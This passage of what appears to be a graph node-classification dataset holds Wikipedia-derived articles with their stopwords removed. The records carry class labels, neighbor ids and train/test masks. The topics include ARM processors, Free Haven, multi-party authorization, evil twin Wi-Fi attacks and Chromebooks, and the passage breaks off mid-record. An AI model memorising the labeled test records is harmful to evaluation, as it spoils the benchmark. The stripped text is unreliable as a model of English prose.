like cpus day including cache simplicity enabled low power consumption yet better performance intel 80286 successor arm3 produced 4 kb cache improved performance late 1980s apple computer vlsi technology started working acorn newer versions arm core 1990 acorn spun design team new company named advanced risc machines ltd. became arm ltd parent company arm holdings plc floated london stock exchange nasdaq 1998 new apple-arm work would eventually evolve arm6 first released early 1992 apple used arm6-based arm610 basis apple newton pda 1994 acorn used arm610 main central processing unit cpu riscpc computers dec licensed armv4 architecture produced strongarm 233 mhz cpu drew one watt newer versions draw far less work later passed intel part lawsuit settlement intel took opportunity supplement i960 line strongarm intel later developed high performance implementation named xscale since sold marvell transistor count arm core remained essentially throughout changes arm2 30,000 transistors arm6 grew 35,000 2005 98 mobile phones sold used least one arm processor 2010 producers chips based arm architectures reported shipments 6.1 billion arm-based processors representing 95 smartphones 35 digital televisions set-top boxes 10 mobile computers 2011 32-bit arm architecture widely used architecture mobile devices popular 32-bit one embedded systems 2013 10 billion produced arm-based chips found nearly 60 percent world ’ mobile devices arm holdings primary business selling ip cores licensees use create microcontrollers mcus cpus systems-on-chips based cores original design manufacturer combines arm core parts produce complete device typically one built existing semiconductor fabrication plants fabs low cost still deliver substantial performance successful implementation arm7tdmi hundreds millions sold atmel precursor design center arm7tdmi-based embedded system arm architectures used smartphones pdas mobile devices range armv5 armv7-a used low-end midrange devices armv8-a used current high-end devices 2009 manufacturers introduced netbooks based arm architecture cpus direct competition netbooks based intel atom according analyst firm ihs isuppli 2015 arm integrated circuits may 23 laptops arm holdings offers variety licensing terms varying cost deliverables arm holdings provides licensees integratable hardware description arm core well complete software development toolset compiler debugger software development kit right sell manufactured silicon containing arm cpu soc packages integrating arm core designs include nvidia tegra first three generations csr plc quatro family st-ericsson nova novathor silicon labs precision32 mcu texas instruments omap products samsung hummingbird exynos products apple a4 a5 a5x freescale i.mx fabless licensees wish integrate arm core chip design usually interested acquiring ready-to-manufacture verified semiconductor intellectual property core customers arm holdings delivers gate netlist description chosen arm core along abstracted simulation model test programs aid design integration verification ambitious customers including integrated device manufacturers idm foundry operators choose acquire processor ip synthesizable rtl verilog form synthesizable rtl customer ability perform architectural level optimisations extensions allows designer achieve exotic design goals otherwise possible unmodified netlist high clock speed low power consumption instruction set extensions etc. arm holdings grant licensee right resell arm architecture licensees may freely sell manufactured product chip devices evaluation boards complete systems merchant foundries special case allowed sell finished silicon containing arm cores generally hold right re-manufacture arm cores customers arm holdings prices ip based perceived value lower performing arm cores typically lower licence costs higher performing cores implementation terms synthesizable core costs hard macro blackbox core complicating price matters merchant foundry holds arm licence samsung fujitsu offer fab customers reduced licensing costs exchange acquiring arm core foundry in-house design services customer reduce eliminate payment arm upfront licence fee compared dedicated semiconductor foundries tsmc umc without in-house design services fujitsu/samsung charge two- three-times per manufactured wafer low mid volume applications design service foundry offers lower overall pricing subsidisation licence fee high volume mass-produced parts long term cost reduction achievable lower wafer pricing reduces impact arm nre non-recurring engineering costs making dedicated foundry better choice companies designed chips arm cores include amazon.com annapurna labs subsidiary analog devices apple appliedmicro macom technology solutions atmel broadcom cypress semiconductor freescale semiconductor nxp semiconductors huawei maxim integrated nvidia nxp qualcomm renesas samsung electronics st microelectronics texas instruments xilinx february 2016 arm announced built arm cortex technology licence often shortened built cortex boc licence licence allows companies partner arm make modifications arm cortex designs design modifications shared companies semi-custom core designs also brand freedom example kryo 280 companies current licensees built arm cortex technology include qualcomm companies also obtain arm architectural licence designing cpu cores using arm instruction sets cores must comply fully arm architecture companies designed cores implement arm architecture include apple appliedmicro broadcom cavium marvell nvidia qualcomm samsung electronics arm holdings provides list vendors implement arm cores design application specific standard products assp microprocessor microcontrollers arm cores used number products particularly pdas smartphones computing examples microsoft first generation surface surface 2 apple ipads asus eee pad transformer tablet computers several chromebook laptops others include apple iphone smartphone ipod portable media player canon powershot digital cameras nintendo switch hybrid 3ds handheld game consoles tomtom turn-by-turn navigation systems 2005 arm holdings took part development manchester university computer spinnaker used arm cores simulate human brain arm chips also used raspberry pi beagleboard beaglebone pandaboard single-board computers small inexpensive consume little power 32-bit arm architecture armv7-a implementing aarch32 see section armv8 widely used architecture mobile devices since 1995 arm architecture reference manual primary source documentation arm processor architecture instruction set distinguishing interfaces arm processors required support instruction semantics implementation details may vary architecture evolved time version seven architecture armv7 defines three architecture profiles although architecture profiles first defined armv7 arm subsequently defined armv6-m architecture used cortex m0/m0+/m1 subset armv7-m profile fewer instructions except m-profile 32-bit arm architecture specifies several cpu modes depending implemented architecture features moment time cpu one mode switch modes due external events interrupts programmatically original subsequent arm implementation hardwired without microcode like much simpler 8-bit 6502 processor used prior acorn microcomputers 32-bit arm architecture 64-bit architecture part includes following risc features compensate simpler design compared processors like intel 80286 motorola 68020 additional design features used arm includes integer arithmetic operations add subtract multiply versions architecture also support divide operations arm supports 32-bit × 32-bit multiplies either 32-bit result 64-bit result though cortex-m0 m0+ m1 cores n't support 64-bit results arm cores also support 16-bit × 16-bit 32-bit × 16-bit multiplies divide instructions included following arm architectures registers r0 r7 across cpu modes never banked registers r8 r12 across cpu modes except fiq mode fiq mode distinct r8 r12 registers r13 r14 banked across privileged cpu modes except system mode mode entered exception r13 r14 registers generally contain stack pointer return address function calls respectively aliases current program status register cpsr following 32 bits almost every arm instruction conditional execution feature called predication implemented 4-bit condition code selector predicate allow unconditional execution one four-bit codes causes instruction always executed cpu architectures condition codes branch instructions though predicate takes four 32 bits instruction code thus cuts significantly encoding bits available displacements memory access instructions avoids branch instructions generating code small codice_1 statements apart eliminating branch instructions preserves fetch/decode/execute pipeline cost one cycle per skipped instruction standard example conditional execution subtraction-based euclidean algorithm c programming language loop arm assembly loop effectively transformed coded avoids branches around codice_2 codice_3 clauses codice_4 codice_5 equal neither codice_6 instructions executed eliminating need conditional branch implement codice_7 check top loop example codice_8 less equal used one ways thumb code provides dense encoding remove four-bit selector non-branch instructions another feature instruction set ability fold shifts rotates data processing arithmetic logical register-register move instructions example c statement could rendered single-word single-cycle instruction results typical arm program denser expected fewer memory accesses thus pipeline used efficiently arm processor also features rarely seen risc architectures pc-relative addressing indeed 32-bit arm pc one 16 registers pre- post-increment addressing modes arm instruction set increased time early arm processors arm7tdmi example instruction store two-byte quantity arm7 earlier implementations three-stage pipeline stages fetch decode execute higher-performance designs arm9 deeper pipelines cortex-a8 thirteen stages additional implementation changes higher performance include faster adder extensive branch prediction logic difference arm7di arm7dmi cores example improved multiplier hence added arm architecture pre-armv8 provides non-intrusive way extending instruction set using coprocessors addressed using mcr mrc mrrc mcrr similar instructions coprocessor space divided logically 16 coprocessors numbers 0 15 coprocessor 15 cp15 reserved typical control functions like managing caches mmu operation processors one arm-based machines peripheral devices usually attached processor mapping physical registers arm memory space coprocessor space connecting another device bus turn attaches processor coprocessor accesses lower latency peripherals—for example xscale interrupt controller—are accessible ways memory coprocessors cases chip designers integrate hardware using coprocessor mechanism example image processing engine might small arm7tdmi core combined coprocessor specialised operations support specific set hdtv transcoding primitives modern arm processors include hardware debugging facilities allowing software debuggers perform operations halting stepping breakpointing code starting reset facilities built using jtag support though newer cores optionally support arm two-wire swd protocol arm7tdmi cores represented jtag debug support represented presence embeddedice debug module arm7 arm9 core generations embeddedice jtag de facto debug standard though architecturally guaranteed armv7 architecture defines basic debug facilities architectural level include breakpoints watchpoints instruction execution debug mode similar facilities also available embeddedice halt mode monitor mode debugging supported actual transport mechanism used access debug facilities architecturally specified implementations generally include jtag support separate arm coresight debug architecture architecturally required armv7 processors improve arm architecture digital signal processing multimedia applications dsp instructions added set signified e name armv5te armv5tej architectures e-variants also imply new instructions common digital signal processor dsp architectures include variations signed multiply–accumulate saturated add subtract count leading zeros introduced armv6 architecture precursor advanced simd also known neon jazelle dbx direct bytecode execution technique allows java bytecode executed directly arm architecture third execution state instruction set alongside existing arm thumb-mode support state signified j armv5tej architecture arm9ej-s arm7ej-s core names support state required starting armv6 except armv7-m profile though newer cores include trivial implementation provides hardware acceleration improve compiled code-density processors since arm7tdmi released 1994 featured thumb instruction set state tdmi indicates thumb feature state processor executes thumb instruction set compact 16-bit encoding subset arm instruction set thumb instructions directly mapped normal arm instructions space-saving comes making instruction operands implicit limiting number possibilities compared arm instructions executed arm instruction set state thumb 16-bit opcodes less functionality example branches conditional many opcodes restricted accessing half cpu general-purpose registers shorter opcodes give improved code density overall even though operations require extra instructions situations memory port bus width constrained less 32 bits shorter thumb opcodes allow increased performance compared 32-bit arm code less program code may need loaded processor constrained memory bandwidth unlike processor architectures variable length 16- 32-bit instructions cray-1 hitachi superh arm thumb instruction sets exist independently embedded hardware game boy advance typically small amount ram accessible full 32-bit datapath majority accessed via 16-bit narrower secondary datapath situation usually makes sense compile thumb code hand-optimise cpu-intensive sections using full 32-bit arm instructions placing wider instructions 32-bit bus accessible memory first processor thumb instruction decoder arm7tdmi arm9 later families including xscale included thumb instruction decoder includes instructions adopted hitachi superh 1992 licensed arm arm smallest processor families cortex m0 m1 implement 16-bit thumb instruction set maximum performance lowest cost applications thumb-2 technology introduced arm1156 core announced 2003 thumb-2 extends limited 16-bit instruction set thumb additional 32-bit instructions give instruction set breadth thus producing variable-length instruction set stated aim thumb-2 achieve code density similar thumb performance similar arm instruction set 32-bit memory thumb-2 extends thumb instruction set bit-field manipulation table branches conditional execution time arm instruction set extended maintain equivalent functionality instruction sets new unified assembly language ual supports generation either thumb arm instructions source code versions thumb seen armv7 processors essentially capable arm code including ability write interrupt handlers requires bit care use new if-then instruction permits four successive instructions execute based tested condition inverse compiling arm code ignored compiling thumb generates actual instruction example armv7 chips support thumb instruction set chips cortex-a series cortex-r series arm11 series support arm instruction set state thumb instruction set state chips cortex-m series support thumb instruction set thumbee erroneously called thumb-2ee arm documentation marketed jazelle rct runtime compilation target announced 2005 first appearing cortex-a8 processor thumbee fourth instruction set state making small changes thumb-2 extended instruction set changes make instruction set particularly suited code generated runtime e.g jit compilation managed execution environments thumbee target languages java c perl python allows jit compilers output smaller compiled code without impacting performance new features provided thumbee include automatic null pointer checks every load store instruction instruction perform array bounds check special instructions call handler addition utilises thumb-2 technology thumbee provides access registers r8-r15 jazelle/dbx java vm state held handlers small sections frequently called code commonly used implement high level languages allocating memory new object changes come repurposing handful opcodes knowing core new thumbee state 23 november 2011 arm holdings deprecated use thumbee instruction set armv8 removes support thumbee vfp vector floating point technology fpu floating-point unit coprocessor extension arm architecture implemented differently armv8 – coprocessors defined provides low-cost single-precision double-precision floating-point computation fully compliant ansi/ieee std 754-1985 standard binary floating-point arithmetic vfp provides floating-point computation suitable wide spectrum applications pdas smartphones voice compression decompression three-dimensional graphics digital audio printers set-top boxes automotive applications vfp architecture intended support execution short vector mode instructions operated vector element sequentially thus offer performance true single instruction multiple data simd vector parallelism vector mode therefore removed shortly introduction replaced much powerful neon advanced simd unit devices arm cortex-a8 cut-down vfplite module instead full vfp module require roughly ten times clock cycles per float operation pre-armv8 architecture implemented floating-point/simd coprocessor interface floating-point and/or simd units found arm-based processors using coprocessor interface include fpa fpe iwmmxt implemented software trapping could implemented hardware provide functionality vfp opcode-compatible debian gnu/linux derivatives ubuntu armhf arm hard float refers armv7 architecture including additional vfp3-d16 floating-point hardware extension thumb-2 software packages cross-compiler tools use armhf vs. arm/armel suffixes differentiate advanced simd extension aka neon mpe media processing engine combined 64- 128-bit simd instruction set provides standardized acceleration media signal processing applications neon included cortex-a8 devices optional cortex-a9 devices neon execute mp3 audio decoding cpus running 10 mhz run gsm adaptive multi-rate amr speech codec 13 mhz features comprehensive instruction set separate register files independent execution hardware neon supports 8- 16- 32- 64-bit integer single-precision 32-bit floating-point data simd operations handling audio video processing well graphics gaming processing neon simd supports 16 operations time neon hardware shares floating-point registers used vfp devices arm cortex-a8 cortex-a9 support 128-bit vectors execute 64 bits time whereas newer cortex-a15 devices execute 128 bits time projectne10 arm first open-source project inception acquired older project known mbed tls ne10 library set common useful functions written neon c compatibility library created allow developers use neon optimisations without learning neon also serves set highly optimised neon intrinsic assembly code examples common dsp arithmetic image processing routines source code available github security extensions marketed trustzone technology armv6kz later application profile architectures provides low-cost alternative adding another dedicated security core soc providing two virtual processors backed hardware based access control lets application core switch two states referred worlds reduce confusion names capability domains order prevent information leaking trusted world less trusted world world switch generally orthogonal capabilities processor thus world operate independently using core memory peripherals made aware operating world core may use provide access control secrets code device typically rich operating system run less trusted world smaller security-specialized code trusted world aiming reduce attack surface typical applications include drm functionality controlling use media arm-based devices preventing unapproved use device practice since specific implementation details proprietary trustzone implementations publicly disclosed review unclear level assurance provided given threat model immune attack open virtualization open source implementation trusted world architecture trustzone amd licensed incorporated trustzone technology secure processor technology enabled products amd apus include cortex-a5 processor handling secure processing fact cortex-a5 trustzone core included earlier amd products enabled due time constraints samsung knox uses trustzone purposes detecting modifications kernel security extension marketed trustzone armv8-m technology introduced armv8-m architecture armv6 arm architecture supports no-execute page protection referred xn execute never large physical address extension lpae extends physical address size 32 bits 40 bits added armv7-a architecture 2011 physical address size larger 44 bits cortex-a75 cortex-a65ae armv8-r armv8-m sub-architectures announced armv8-a sub-architecture share features armv8-a n't include 64-bit aarch64 instructions announced october 2011 armv8-a often called armv8 armv8-r also available represents fundamental change arm architecture adds optional 64-bit architecture e.g cortex-a32 32-bit armv8-a cpu armv8-a cpus support 64-bit unlike armv8-r named aarch64 associated new a64 instruction set aarch64 provides user-space compatibility armv7-a 32-bit architecture therein referred aarch32 old 32-bit instruction set named a32 thumb instruction set referred t32 64-bit counterpart armv8-a allows 32-bit applications executed 64-bit os 32-bit os control 64-bit hypervisor arm announced cortex-a53 cortex-a57 cores 30 october 2012 apple first release armv8-a compatible core apple a7 consumer product iphone 5s appliedmicro using fpga first demo armv8-a first armv8-a soc samsung exynos 5433 used galaxy note 4 features two clusters four cortex-a57 cortex-a53 cores big.little configuration run aarch32 mode aarch32 aarch64 armv8-a makes vfpv3/v4 advanced simd neon standard also adds cryptography instructions supporting aes sha-1/sha-256 finite field arithmetic aarch64 introduced armv8-a included subsequent versions armv8-a aarch64 included armv8-r armv8-m 32-bit architectures december 2014 armv8.1-a update incremental benefits v8.0 announced enhancements fell two categories changes instruction set changes exception model memory translation instruction set enhancements included following enhancements exception model memory translation system included following january 2016 armv8.2-a announced enhancements fell four categories scalable vector extension sve new extension armv8 allowing implementation choices vector lengths scale 128 2048 bits complementary extension replace neon 512-bit variant already implemented supercomputer based arm cpu prototype sve variant aims world highest-performing supercomputer goal beginning full operations around 2021 see arm holdings supercomputers e.g crays fujitsus sve optional extension armv8.2-a architecture newer supported gcc 8 compiler october 2016 armv8.3-a announced enhancements fell six categories armv8.3-a architecture supported least gcc 7 compiler armv8.4-a adds e.g sha3 sha512 sm3 sm4 crypto extensions improved virtualization support memory partitioning monitoring mpam capabilities new secure el2 state activity monitors dot product sdot udot instructions armv8.5-a adds e.g memory tagging extension mte branch target indicators bti reduce ability attacker execute arbitrary code random number generator instructions – providing deterministic true random numbers conforming various national international standards august 2 2019 google announced android would adopt memory tagging extension mte 2019 arm announced scalable vector extension 2 sve2 transactional memory extension tme sve2 builds sve scalable vectorization increased fine-grain data level parallelism dlp allow work done per instruction sve2 aims bring benefits wider range software including dsp multimedia simd code currently use neon llvm/clang 9.0 gcc 10.0 development codes updated support sve2 tme brings support hardware transactional memory htm hardware lock elision tle tme aims bring scalable concurrency increase coarse-grain thread level parallelism tlp allow work done per thread llvm/clang 9.0 gcc 10.0 development codes updated support tme platform security architecture psa architecture-agnostic security framework evaluation scheme intended help secure internet things iot devices built system-on-a-chip soc processors introduced arm 2017 annual techcon event first used arm cortex-m processor cores intended microcontroller use psa includes freely available threat models security analyses demonstrate process deciding security features common iot products psa also provides freely downloadable application programming interface api packages architectural specifications open-source firmware implementations related test suites psa certified offers multi-level security evaluation scheme chip vendors os providers iot device makers first 32-bit arm-based personal computer acorn archimedes ran interim operating system called arthur evolved risc os used later arm-based systems acorn vendors acorn machines also unix port called risc ix neither confused risc/os contemporary unix variant mips architecture 32-bit arm architecture supported large number embedded real-time operating systems including 32-bit arm architecture primary hardware environment mobile device operating systems previously discontinued 32-bit arm architecture supported risc os multiple unix-like operating systems including windows applications recompiled arm linked winelib wine project run 32-bit 64-bit arm linux freebsd compatible enough operating systems x86 binaries e.g specially compiled arm demonstrated arm using qemu wine linux work full speed capability winelib",
    "neighbors": [
      6151,
      6158,
      10254,
      4112,
      2066,
      2073,
      6171,
      2081,
      6178,
      6180,
      6181,
      38,
      8231,
      2088,
      8233,
      10277,
      4139,
      44,
      8237,
      2094,
      10284,
      4144,
      2097,
      2105,
      8250,
      8253,
      6207,
      10303,
      2113,
      8266,
      8268,
      4188,
      99,
      10361,
      6266,
      6268,
      8322,
      2179,
      4228,
      8327,
      10375,
      4237,
      142,
      4238,
      146,
      10394,
      6301,
      2208,
      8352,
      4258,
      6311,
      4264,
      4269,
      4270,
      2224,
      2225,
      2226,
      4286,
      8383,
      2241,
      10433,
      2243,
      2250,
      10443,
      2258,
      2275,
      2285,
      8429,
      10478,
      8433,
      242,
      4341,
      10485,
      6391,
      8439,
      249,
      6393,
      8445,
      8450,
      2308,
      10501,
      6415,
      4374,
      2334,
      2339,
      295,
      8487,
      10537,
      4399,
      4400,
      10548,
      309,
      8501,
      8506,
      321,
      8514,
      10562,
      4423,
      8523,
      6476,
      336,
      2388,
      344,
      8539,
      6495,
      8543,
      10601,
      8554,
      10603,
      4465,
      372,
      373,
      10612,
      10620,
      2430,
      8576,
      8582,
      392,
      4491,
      6539,
      4493,
      398,
      2449,
      407,
      409,
      4505,
      4508,
      8609,
      10658,
      4515,
      426,
      8621,
      10669,
      2480,
      8624,
      10675,
      4534,
      2492,
      453,
      2502,
      455,
      2504,
      4550,
      6607,
      464,
      6608,
      466,
      2514,
      2517,
      473,
      4569,
      2524,
      477,
      4581,
      2536,
      10734,
      495,
      6639,
      499,
      4596,
      2549,
      10746,
      4603,
      508,
      8700,
      10752,
      10755,
      8716,
      2574,
      10767,
      8720,
      10776,
      10779,
      10781,
      10786,
      556,
      10796,
      561,
      6705,
      8754,
      6715,
      10813,
      2623,
      8771,
      4679,
      2635,
      2637,
      2638,
      8795,
      2655,
      2658,
      6754,
      10851,
      2666,
      8812,
      10862,
      2671,
      8815,
      630,
      8822,
      638,
      644,
      10884,
      8842,
      6797,
      2704,
      659,
      2707,
      666,
      8861,
      2719,
      6815,
      673,
      6818,
      4773,
      6821,
      682,
      8890,
      10945,
      8900,
      2761,
      8907,
      2764,
      8908,
      4816,
      4821,
      10966,
      8919,
      2777,
      731,
      10971,
      4833,
      2788,
      6884,
      4841,
      10985,
      8940,
      8944,
      757,
      2805,
      2814,
      4865,
      4868,
      2821,
      6924,
      781,
      6925,
      6926,
      8976,
      11028,
      2838,
      4887,
      6936,
      2843,
      2844,
      797,
      2849,
      6950,
      11047,
      810,
      9003,
      2862,
      815,
      11054,
      11060,
      11062,
      823,
      6971,
      4928,
      833,
      6978,
      6979,
      11074,
      6981,
      11079,
      11080,
      9042,
      6996,
      9044,
      2910,
      9064,
      2925,
      11125,
      7033,
      11135,
      9092,
      9101,
      7057,
      915,
      9107,
      7065,
      7071,
      2979,
      5028,
      7077,
      934,
      9126,
      936,
      11184,
      9137,
      9152,
      7106,
      9155,
      966,
      3014,
      5065,
      3017,
      9163,
      5072,
      977,
      11218,
      980,
      5078,
      9174,
      7134,
      9182,
      5090,
      995,
      3043,
      9190,
      3050,
      1005,
      5103,
      1014,
      3070,
      7170,
      7173,
      3089,
      11282,
      9235,
      5144,
      11289,
      3102,
      1057,
      3114,
      1067,
      7218,
      11314,
      11322,
      1083,
      1085,
      9280,
      7234,
      7235,
      11333,
      3142,
      9291,
      1122,
      11363,
      7269,
      3175,
      11374,
      1137,
      3185,
      7281,
      7286,
      3197,
      7299,
      7300,
      3205,
      1158,
      7302,
      11395,
      7305,
      11396,
      11405,
      7313,
      1170,
      9363,
      9366,
      9369,
      9371,
      11424,
      9391,
      3248,
      5297,
      11447,
      7361,
      3270,
      5326,
      5329,
      11473,
      9428,
      7382,
      5339,
      3293,
      11487,
      3301,
      1255,
      5356,
      5358,
      3319,
      9463,
      5378,
      5381,
      1298,
      11539,
      5397,
      7445,
      11545,
      9500,
      5417,
      11566,
      9541,
      7494,
      5457,
      7505,
      11604,
      1376,
      1377,
      9579,
      9581,
      9582,
      11629,
      5492,
      1399,
      1402,
      3451,
      1409,
      3457,
      3462,
      3467,
      3470,
      5518,
      1427,
      1428,
      5523,
      1442,
      3493,
      5541,
      9637,
      1448,
      9638,
      7595,
      1453,
      1461,
      1462,
      1463,
      3511,
      7607,
      1480,
      7629,
      7631,
      3540,
      9685,
      3542,
      1499,
      7645,
      1502,
      5598,
      7653,
      9707,
      5612,
      3565,
      3573,
      3575,
      1533,
      3585,
      3586,
      9732,
      7689,
      9739,
      1548,
      5645,
      7697,
      3603,
      7699,
      3605,
      5655,
      1561,
      5663,
      5677,
      3630,
      9774,
      7745,
      7747,
      3654,
      3658,
      5708,
      1614,
      7772,
      7774,
      1632,
      7783,
      3691,
      3698,
      9863,
      7820,
      1682,
      7833,
      5786,
      5793,
      1702,
      7852,
      7854,
      7857,
      7858,
      9911,
      9913,
      1728,
      5824,
      9921,
      9928,
      9932,
      7889,
      5844,
      7911,
      7913,
      9964,
      1776,
      9970,
      9976,
      9978,
      3835,
      7936,
      3844,
      5892,
      1798,
      7941,
      1801,
      3857,
      3865,
      7963,
      10016,
      5922,
      1832,
      3886,
      5938,
      7988,
      7991,
      1849,
      5948,
      8003,
      3911,
      5963,
      1871,
      1872,
      3932,
      3936,
      10080,
      8044,
      3950,
      1903,
      5998,
      6001,
      8048,
      1911,
      8058,
      10109,
      6016,
      3971,
      3978,
      1937,
      6038,
      8094,
      1952,
      6050,
      10149,
      8102,
      1964,
      1967,
      8120,
      8125,
      4030,
      1983,
      8126,
      6084,
      4039,
      4040,
      6093,
      10199,
      6117,
      10223,
      10224,
      2039,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 9965,
    "label": 4,
    "text": "Free_Haven_Project:free project free project formed 1999 group massachusetts institute technology students aim develop secure decentralized system data storage group work led collaboration united states naval research laboratory develop tor funded darpa project early work focused anonymous storage system free designed ensure privacy security readers publishers contrasts free anonymous publishing services emphasize persistence rather accessibility free distributed peer-to-peer system designed create servnet consisting servnet nodes hold fragments shares documents divided using rabin information dispersal algorithm publisher file contents determined one piece shares stored servnet along unique public key recover recreate file client broadcasts public key find fragments sent client along anonymous routes greater security free periodically moves location shares nodes function similar freenet greater focus persistence ensure unpopular files disappear mechanisms enable persistence however also cause problems inefficiency referral- recommendation-based metatrust reputation system built servnet attempts ensure reciprocity information value holding node operators accountable although nodes remain pseudonymous communication facilitated operators anonymous email tor developed us naval research laboratory free project secure government communications initial funding us office naval research darpa tor deployed 2003 third generation deployed onion routing designs 2005 electronic frontier foundation provided additional funding free project 2006 tor project incorporated non-profit organization",
    "neighbors": [
      8640,
      9762,
      7652,
      10726,
      8331,
      82,
      9240
    ],
    "mask": "None"
  },
  {
    "node_id": 9966,
    "label": 4,
    "text": "Multi-party_authorization:multi-party authorization multi-party authorization mpa process protect telecommunications network data center industrial control system undesirable acts malicious insider inexperienced technician acting alone mpa requires second authorized user approve action allowed take place pro-actively protects data systems undesirable act existing methods protect data systems malicious insider include auditing job rotation separation duties auditing reactive method meant discover fact job rotation separation duties limiting techniques meant minimize prolonged access sensitive data systems order limit undesirable acts contrast mpa pro-active solution advantage mpa methods protect undesirable acts malicious insider inexperienced operator mpa pro-active prevents data systems compromise single entity acting alone mpa prevents initial undesirable act rather dealing breach compromise fact multi-party authorization technology secure vulnerable sensitive activities data sources attack compromised insider acting alone somewhat analogous weapons systems require two individuals turn two different keys order enable system one person alone another example consider access lock box bank access requires multiple parties one lock box owner another bank official individuals act together access lock box neither could alone mpa like manner ensures second set eyes reviews approves activity involving critical sensitive data systems action takes place multi-party authorization suitable wide variety applications mpa implemented protect type sensitive data electronic form activity within network infrastructure computerized control system electronic health record example data record could protected mpa multi-party authorization provides pro-active protection undesirable acts inexperienced technician malicious insider us patent 7,519,826 issued april 14 2009 near real time multi-party task authorization access control businessedge nov 25 2009 protecting malicious insider multi party authorization",
    "neighbors": [
      7368,
      11507,
      11244
    ],
    "mask": "None"
  },
  {
    "node_id": 9967,
    "label": 7,
    "text": "Distributed_social_network:distributed social network distributed social network federated social network internet social networking service decentralized distributed across distinct providers something like email social networks fediverse consists multiple social websites users site communicate users involved sites societal perspective one may compare concept social media public utility social website participating distributed social network interoperable sites federation communication among social websites technically conducted social networking protocols software used distributed social networking generally portable easily adopted various website platforms distributed social networks contrast social network aggregation services used manage accounts activities across multiple discrete social networks social networking service providers used term broadly describe provider-specific services distributable across different websites typically added widgets plug-ins add-ons social network functionality implemented users websites distributed social network projects generally develop software protocols software generally free open source protocols generally open free open standards oauth authorization openid authentication ostatus federation activitypub federation protocol xrd metadata discovery portable contacts protocol wave federation protocol extensible messaging presence protocol xmpp aka jabber opensocial widget apis microformats like xfn hcard atom web feeds—increasingly referred together open stack—are often cited enabling technologies distributed social networking electronic frontier foundation eff u.s. legal defense organization advocacy group civil liberties internet endorses distributed social network model one plausibly return control choice hands internet user allow persons living restrictive regimes conduct activism social networking sites also choice services providers may better equipped protect security anonymity world wide web consortium w3c main international standards organization world wide web launched new social activity july 2014 develop standards social web application interoperability",
    "neighbors": [
      546,
      10242,
      2948,
      7368,
      6750,
      11164,
      78,
      11408,
      756,
      534,
      119,
      5433,
      124,
      574
    ],
    "mask": "Test"
  },
  {
    "node_id": 9968,
    "label": 4,
    "text": "Evil_twin_(wireless_networks):evil twin wireless networks evil twin fraudulent wi-fi access point appears legitimate set eavesdrop wireless communications evil twin wireless lan equivalent phishing scam type attack may used steal passwords unsuspecting users either monitoring connections phishing involves setting fraudulent web site luring people attacker snoops internet traffic using bogus wireless access point unwitting web users may invited log attacker server prompting enter sensitive information usernames passwords often users unaware duped well incident occurred users log unsecured non-https bank e-mail accounts attacker intercepts transaction since sent equipment attacker also able connect networks associated users credentials fake access points set configuring wireless card act access point known hostap hard trace since shut instantly counterfeit access point may given ssid bssid nearby wi-fi network evil twin configured pass internet traffic legitimate access point monitoring victim connection simply say system temporarily unavailable obtaining username password",
    "neighbors": [
      6466,
      4517,
      8264,
      7850,
      4620,
      119,
      794,
      2430
    ],
    "mask": "None"
  },
  {
    "node_id": 9969,
    "label": 9,
    "text": "Daniel_G._Bobrow:daniel g. bobrow daniel gureasko bobrow 29 november 1935 – 20 march 2017 american computer scientist created oft-cited artificial intelligence program student earned phd. worked bbn technologies bbn research fellow intelligent systems laboratory palo alto research center born new york city earned bs rpi 1957 sm harvard 1958 phd mathematics mit supervision marvin minsky 1964 bbn developer tenex bobrow president american association artificial intelligence aaai chair cognitive science society editor-in-chief journal artificial intelligence shared 1992 acm software systems award work interlisp acm fellow aaai fellow",
    "neighbors": [
      4992,
      10752,
      11269,
      2438,
      3334,
      5751,
      6919,
      7048,
      7562,
      2062,
      9231,
      1301,
      9749,
      9877,
      8728,
      4633,
      6556,
      3869,
      10012,
      2335,
      6047,
      8226,
      4516,
      5031,
      9128,
      5803,
      5420,
      2225,
      10547,
      11255,
      311,
      2105,
      7867,
      6717,
      4799,
      5569,
      6594,
      8771,
      4550,
      7880,
      6603,
      8908,
      1613,
      205,
      5585,
      11218,
      9299,
      10712,
      3034,
      3675,
      219,
      10463,
      7392,
      7904,
      11488,
      7267,
      10083,
      8293,
      6502,
      2666,
      3051,
      5360,
      5361,
      8435,
      3446,
      1783,
      6906,
      7805,
      11390
    ],
    "mask": "Test"
  },
  {
    "node_id": 9970,
    "label": 7,
    "text": "Chromebook:chromebook chromebook laptop tablet running linux-based chrome os operating system devices primarily used perform variety tasks using google chrome browser applications data residing cloud rather machine chromebooks released since late 2017 also run android apps chromebooks run linux apps first chromebooks sale acer inc. samsung began shipping june 15 2011 addition laptop models desktop version called chromebox introduced may 2012 all-in-one device called chromebase introduced january 2014 lg electronics october 2012 simon phipps writing infoworld said chromebook line probably successful linux desktop/laptop computer 've seen date january november 2013 1.76 million chromebooks sold us business-to-business channels march 2018 chromebooks made 60 computers purchased schools usa april 2017 electronic frontier foundation accused google using chromebooks collect data mine school children personal information including internet searches without parents consent two years eff filed federal complaint company first chromebooks sale acer inc. samsung announced google i/o conference may 2011 began shipping june 15 2011 lenovo hewlett packard google entered market early 2013 december 2013 samsung launched samsung chromebook specifically indian market employed company exynos 5 dual core processor critical reaction device initially skeptical reviewers new york times technology columnist david pogue unfavorably comparing value proposition chromebooks fully featured laptops running microsoft windows operating system complaint dissipated later reviews machines acer samsung priced lower february 2013 google announced began shipping chromebook pixel higher-spec machine high-end price tag january 2015 acer announced first big screen chromebook acer chromebook 15 fhd 15.6-inch display besides laptops devices run chrome os well desktop version called chromebox introduced may 2012 samsung chromebase all-in-one device introduced january 2014 lg electronics march 2018 acer google announced first chromebook tablet chromebook tab 10 device expected compete lower-priced apple ipad tablet education market tab 10 display—9.7-inch 2048 x 1536 resolution—was ipad device included stylus neither device included keyboard may 2016 google announced would make android apps available chromebooks via google play application distribution platform time google play access scheduled asus chromebook flip acer chromebook r 11 recent chromebook pixel chromebooks slated time partnering google samsung released chromebook plus chromebook pro early 2017 first chromebooks come play store pre-installed february 2017 review verge reported plus arm processor handled android apps much better intel-based pro said android apps chrome os still beta much unfinished experience number chrome os systems supporting android apps either stable beta channel increasing may 2018 google announced would make linux desktop apps available chromebooks via virtual machine code-named crostini initial hardware partners chromebook development included acer adobe asus freescale hewlett-packard later hp inc. lenovo qualcomm texas instruments toshiba intel samsung dell chromebooks ship google chrome os operating system uses linux kernel google chrome web-browser integrated media-player enabling developer mode allows installation linux distributions chromebooks crouton script allows installation linux distributions chrome os running operating systems simultaneously chromebooks include seabios turned install boot linux distributions directly limited offline capability fast boot-time 